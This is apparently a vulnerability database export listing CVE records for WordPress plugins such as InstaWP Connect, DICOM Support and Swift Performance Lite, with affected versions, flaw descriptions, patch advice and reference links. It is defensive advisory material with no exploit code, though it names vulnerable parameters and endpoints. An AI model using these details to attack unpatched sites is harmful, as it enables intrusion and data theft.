{"CVE_ID":"CVE-2024-12623","slug":"dicom-support","versionImpact":"0.10.6","versionEndExcluding":"0.10.7","description":"The DICOM Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dcm' shortcode in all versions up to, and including, 0.10.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.10.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dicom-support\\\/trunk\\\/DicomSupport.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dicom-support\\\/trunk\\\/DicomSupport.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257320%40dicom-support&new=3257320%40dicom-support&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257320%40dicom-support&new=3257320%40dicom-support&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d76052f8-34b3-4930-a5bf-182420b07968?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d76052f8-34b3-4930-a5bf-182420b07968?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2795","slug":"codecolorer","versionEndExcluding":"0.10.1","description":"The CodeColorer WordPress plugin before 0.10.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2d6ecd21-3dd4-423d-80e7-277c45080a9f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2d6ecd21-3dd4-423d-80e7-277c45080a9f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11785","slug":"integrate-firebase","versionImpact":"0.9.3","versionEndExcluding":"0.10.0","description":"The Integrate Firebase plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'firebase_show' shortcode in all versions up to, and including, 0.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.10.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202693%40integrate-firebase&new=3202693%40integrate-firebase&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202693%40integrate-firebase&new=3202693%40integrate-firebase&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9788e450-4e79-43ce-ae78-466eef458c29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9788e450-4e79-43ce-ae78-466eef458c29?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12103","slug":"content-no-cache","versionImpact":"0.1.2","versionEndExcluding":"0.1.3","description":"The Content No Cache: prevent specific content from being cached plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 0.1.2 via the eos_dyn_get_content action due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 0.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211815\\\/content-no-cache\\\/trunk\\\/inc\\\/eos-dyn-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211815\\\/content-no-cache\\\/trunk\\\/inc\\\/eos-dyn-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90c6fd67-2140-4835-98d0-cfd1af95ac4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90c6fd67-2140-4835-98d0-cfd1af95ac4c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8189","slug":"wp-multitasking","versionImpact":"0.1.17","versionEndExcluding":"0.1.18","description":"The WP MultiTasking \u2013 WP Utilities plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018wpmt_menu_name\u2019 parameter in all versions up to, and including, 0.1.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 0.1.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c976e5a-2f6c-4632-99a7-a512b3dd38e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c976e5a-2f6c-4632-99a7-a512b3dd38e6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-multitasking\\\/trunk\\\/wp-multitasking.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-multitasking\\\/trunk\\\/wp-multitasking.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-multitasking\\\/trunk\\\/wp-multitasking.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-multitasking\\\/trunk\\\/wp-multitasking.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158305\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158305\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12453","slug":"uptodown-apk-download-widget","versionImpact":"0.1.10","versionEndExcluding":"0.1.11","description":"The Uptodown APK Download Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'utd-widget' shortcode in all versions up to, and including, 0.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uptodown-apk-download-widget\\\/trunk\\\/uptodown_wp_widget.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uptodown-apk-download-widget\\\/trunk\\\/uptodown_wp_widget.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uptodown-apk-download-widget\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uptodown-apk-download-widget\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78c2d5fc-240a-4fed-92ae-b9f84de3e119?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78c2d5fc-240a-4fed-92ae-b9f84de3e119?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2636","slug":"instawp-connect","versionImpact":"0.1.0.85","versionEndExcluding":"0.1.0.86","description":"The InstaWP Connect \u2013 1-click WP Staging & Migration plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.1.0.85 via the 'instawp-database-manager' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 0.1.0.86, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/trunk\\\/includes\\\/database-manager\\\/loader.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/trunk\\\/includes\\\/database-manager\\\/loader.php#L77\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3269681\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3269681\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c8f2c6f-c231-477c-895b-df892569ef95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c8f2c6f-c231-477c-895b-df892569ef95?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13913","slug":"instawp-connect","versionImpact":"0.1.0.83","versionEndExcluding":"0.1.0.84","description":"The InstaWP Connect \u2013 1-click WP Staging & Migration plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.1.0.83. This is due to missing or incorrect nonce validation in the '\/migrate\/templates\/main.php' file. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 0.1.0.84, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/trunk\\\/admin\\\/class-instawp-admin.php#L159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/trunk\\\/admin\\\/class-instawp-admin.php#L159\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/trunk\\\/migrate\\\/templates\\\/main.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/trunk\\\/migrate\\\/templates\\\/main.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254817\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254817\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea6c7b63-00da-4476-a024-97fe99af643d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea6c7b63-00da-4476-a024-97fe99af643d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6397","slug":"instawp-connect","versionImpact":"0.1.0.44","versionEndExcluding":"0.1.0.45","description":"The InstaWP Connect \u2013 1-click WP Staging & Migration plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 0.1.0.44. This is due to insufficient verification of the API key. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username, and to perform a variety of other administrative tasks. NOTE: This vulnerability was partially fixed in 0.1.0.44, but was still exploitable via Cross-Site Request Forgery.","recommendation":"Update to version 0.1.0.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/963f2485-3afa-4e17-8278-b75415af3915?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/963f2485-3afa-4e17-8278-b75415af3915?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.43\\\/includes\\\/class-instawp-hooks.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.43\\\/includes\\\/class-instawp-hooks.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.43\\\/includes\\\/class-instawp-hooks.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.43\\\/includes\\\/class-instawp-hooks.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.43\\\/includes\\\/apis\\\/class-instawp-rest-api.php#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.43\\\/includes\\\/apis\\\/class-instawp-rest-api.php#L256\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109305\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109305\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3114674\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3114674\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4898","slug":"instawp-connect","versionImpact":"0.1.0.38","versionEndExcluding":"0.1.0.39","description":"The InstaWP Connect \u2013 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary option updates due to a missing authorization checks on the REST API calls in all versions up to, and including, 0.1.0.38. This makes it possible for unauthenticated attackers to connect the site to InstaWP API, edit arbitrary site options and create administrator accounts.","recommendation":"Update to version 0.1.0.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92a00fb4-7b50-43fd-ac04-5d6e29336e9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92a00fb4-7b50-43fd-ac04-5d6e29336e9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.38\\\/includes\\\/class-instawp-rest-api.php#L926\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.1.0.38\\\/includes\\\/class-instawp-rest-api.php#L926\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2667","slug":"instawp-connect","versionImpact":"0.1.0.22","versionEndExcluding":"0.1.0.23","description":"The InstaWP Connect \u2013 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to  insufficient file validation in the \/wp-json\/instawp-connect\/v1\/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.","recommendation":"Update to version 0.1.0.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6aead8d-c136-4952-ad03-86fe0f144dea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6aead8d-c136-4952-ad03-86fe0f144dea?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3061039%40instawp-connect&new=3061039%40instawp-connect&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3061039%40instawp-connect&new=3061039%40instawp-connect&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12881","slug":"plugversions","versionImpact":"0.0.7","versionEndExcluding":"0.0.8","description":"The PlugVersions \u2013 Easily rollback to previous versions of your plugins plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the eos_plugin_reviews_restore_version() function in all versions up to, and including, 0.0.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary files leveraging files included locally.","recommendation":"Update to version 0.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211805%40plugversions&new=3211805%40plugversions&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211805%40plugversions&new=3211805%40plugversions&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb06c43c-bf8c-412b-8b1d-fee004d728d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb06c43c-bf8c-412b-8b1d-fee004d728d2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-24003","slug":"wp-popups-lite","versionEndExcluding":" 2.1.4.9","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Timersys WP Popups \u2013 WordPress Popup plugin <= 2.1.4.8 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-popups-lite\\\/wordpress-wp-popups-wordpress-popup-builder-plugin-2-1-4-8-cross-site-scripting-xss?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-popups-lite\\\/wordpress-wp-popups-wordpress-popup-builder-plugin-2-1-4-8-cross-site-scripting-xss?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-30750","slug":"cm-pop-up-banners","versionEndExcluding":" 1.6.0","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CreativeMindsSolutions CM Popup Plugin for WordPress.This issue affects CM Popup Plugin for WordPress: from n\/a through 1.5.10.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/cm-pop-up-banners\\\/wordpress-cm-pop-up-banners-for-wordpress-plugin-1-5-10-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/cm-pop-up-banners\\\/wordpress-cm-pop-up-banners-for-wordpress-plugin-1-5-10-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4788","slug":"dirtysuds-embed-pdf","versionImpact":"1.0.6","description":"The Embed PDF WordPress plugin through 1.0.6 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a162365-5a86-423d-b7c4-55c9b4d8b024\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a162365-5a86-423d-b7c4-55c9b4d8b024\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0420","slug":"custom-post-type-cpt-cusom-taxonomy-ct-manager","versionImpact":"1.1","description":"The Custom Post Type and Taxonomy GUI Manager WordPress plugin through 1.1 does not have CSRF, and is lacking sanitising as well as escaping in some parameters, allowing attackers to make a logged in admin put Stored Cross-Site Scripting payloads via CSRF","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/266e417f-ece7-4ff5-a724-4d9c8e2f3faa\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/266e417f-ece7-4ff5-a724-4d9c8e2f3faa\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36741","slug":"dc-woocommerce-multi-vendor","versionImpact":"3.5.7","description":"The MultiVendorX plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.7. This is due to missing or incorrect nonce validation on the submit_comment() function. This makes it possible for unauthenticated attackers to submit comments via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/3.5.8\\\/classes\\\/class-wcmp-vendor-dashboard.php?rev=2381617#L432\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/3.5.8\\\/classes\\\/class-wcmp-vendor-dashboard.php?rev=2381617#L432\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c3d9fa7-8ea2-4213-8b28-2ca9191a8223?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c3d9fa7-8ea2-4213-8b28-2ca9191a8223?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3677","slug":"woo-pdf-invoice-builder","versionImpact":"1.2.89","description":"The WooCommerce PDF Invoice Builder plugin for WordPress is vulnerable to SQL Injection via the pageId parameter in versions up to, and including, 1.2.89 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for subscribers or higher to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?rev=2935371#L712\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?rev=2935371#L712\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4336d597-7e87-46eb-8abd-9fafd6cd25d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4336d597-7e87-46eb-8abd-9fafd6cd25d9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2949518\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?contextall=1&old=2935371&old_path=%2Fwoo-pdf-invoice-builder%2Ftrunk%2Fwoocommerce-pdf-invoice-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2949518\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?contextall=1&old=2935371&old_path=%2Fwoo-pdf-invoice-builder%2Ftrunk%2Fwoocommerce-pdf-invoice-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5668","slug":"whatsapp","versionImpact":"1.0.1","description":"The WhatsApp Share Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'whatsapp' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77911b0f-c028-49ae-b85e-15909d806e30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77911b0f-c028-49ae-b85e-15909d806e30?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/whatsapp\\\/tags\\\/1.0.1\\\/class-frontend.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/whatsapp\\\/tags\\\/1.0.1\\\/class-frontend.php#L46\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3722","slug":"swift-performance-lite","versionImpact":"2.3.6.18","description":"The Swift Performance Lite plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the ajax_handler() function in all versions up to, and including, 2.3.6.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve and modify settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swift-performance-lite\\\/trunk\\\/includes\\\/setup\\\/setup.php#L97\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swift-performance-lite\\\/trunk\\\/includes\\\/setup\\\/setup.php#L97\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58b7736a-e3e0-4ecd-9adf-284568b02ef7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58b7736a-e3e0-4ecd-9adf-284568b02ef7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5577","slug":"where-i-was-where-i-will-be","versionImpact":"1.1.1","description":"The Where I Was, Where I Will Be plugin for WordPress is vulnerable to Remote File Inclusion in version <= 1.1.1 via the WIW_HEADER parameter of the \/system\/include\/include_user.php file. This makes it possible for unauthenticated attackers to include and execute arbitrary files hosted on external servers, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution. This requires allow_url_include to be set to true in order to exploit, which is not commonly enabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 